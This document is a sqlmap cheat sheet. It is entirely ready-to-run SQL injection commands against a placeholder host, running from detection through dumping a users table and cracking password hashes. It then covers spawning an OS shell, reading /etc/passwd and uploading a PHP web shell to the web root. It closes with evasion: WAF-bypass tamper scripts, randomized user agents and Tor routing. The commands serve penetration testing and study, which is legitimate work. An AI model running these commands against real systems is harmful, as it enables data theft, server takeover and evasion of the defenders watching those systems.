SQLMap Cheat Sheet

Automated SQL injection detection and exploitation with sqlmap, from basic URL testing through database enumeration, OS-level access, and WAF bypass techniques.

Basic Usage

Test a URL parameter for SQL injection (--batch accepts the default answer to every prompt instead of asking)

$ sqlmap -u "http://target.com/page?id=1" --batch

Test injection from a saved HTTP request file (for example, one exported from Burp)

$ sqlmap -r request.txt --batch

Automatically detect and test HTML forms on a page

$ sqlmap -u "http://target.com/page?id=1" --forms --batch

Test with authentication cookies

$ sqlmap -u "http://target.com/page?id=1" --cookie="session=abc123" --batch

Test POST parameters for injection

$ sqlmap -u "http://target.com/api/v1/users" --method=POST --data="id=1&name=test" --batch

Injection Techniques

Use only boolean-blind, error-based, and UNION techniques

$ sqlmap -u "http://target.com/page?id=1" --technique=BEU --batch

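Maximum detection level and risk for thorough testing (risk 3 adds OR-based payloads, which can modify data when the injection point sits in an UPDATE statement)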

$ sqlmap -u "http://target.com/page?id=1" --level=5 --risk=3 --batch

Custom injection prefix and suffix for complex queries

$ sqlmap -u "http://target.com/page?id=1" --prefix="')" --suffix="-- -" --batch

Second-order injection, where the result appears on a different page

$ sqlmap -u "http://target.com/page?id=1" --second-url="http://target.com/result" --batch

Enumeration

Enumerate all available databases

$ sqlmap -u "http://target.com/page?id=1" --dbs --batch

List all tables in a specific database

$ sqlmap -u "http://target.com/page?id=1" -D dbname --tables --batch

Dump all rows from the users table

$ sqlmap -u "http://target.com/page?id=1" -D dbname -T users --dump --batch

Get current DB user, database name, and DBA status

$ sqlmap -u "http://target.com/page?id=1" --current-user --current-db --is-dba --batch

Enumerate and attempt to crack database user password hashes

$ sqlmap -u "http://target.com/page?id=1" --passwords --batch

OS Access

Attempt to spawn an interactive OS shell via SQL injection

$ sqlmap -u "http://target.com/page?id=1" --os-shell --batch

Execute a single OS command through the injection point

$ sqlmap -u "http://target.com/page?id=1" --os-cmd="whoami" --batch

Read a file from the server filesystem via injection

$ sqlmap -u "http://target.com/page?id=1" --file-read="/etc/passwd" --batch

Upload a local file to the target server

$ sqlmap -u "http://target.com/page?id=1" --file-write="shell.php" --file-dest="/var/www/html/shell.php" --batch

Tamper Scripts & Evasion

Replace spaces with inline comments to bypass WAF

$ sqlmap -u "http://target.com/page?id=1" --tamper=space2comment --batch

Chain tampers: BETWEEN instead of comparison, randomize case

$ sqlmap -u "http://target.com/page?id=1" --tamper=between,randomcase --batch

Randomize User-Agent and add delay between requests

$ sqlmap -u "http://target.com/page?id=1" --random-agent --delay=2 --batch

Route traffic through Tor and verify connectivity

$ sqlmap -u "http://target.com/page?id=1" --tor --tor-type=SOCKS5 --check-tor --batch
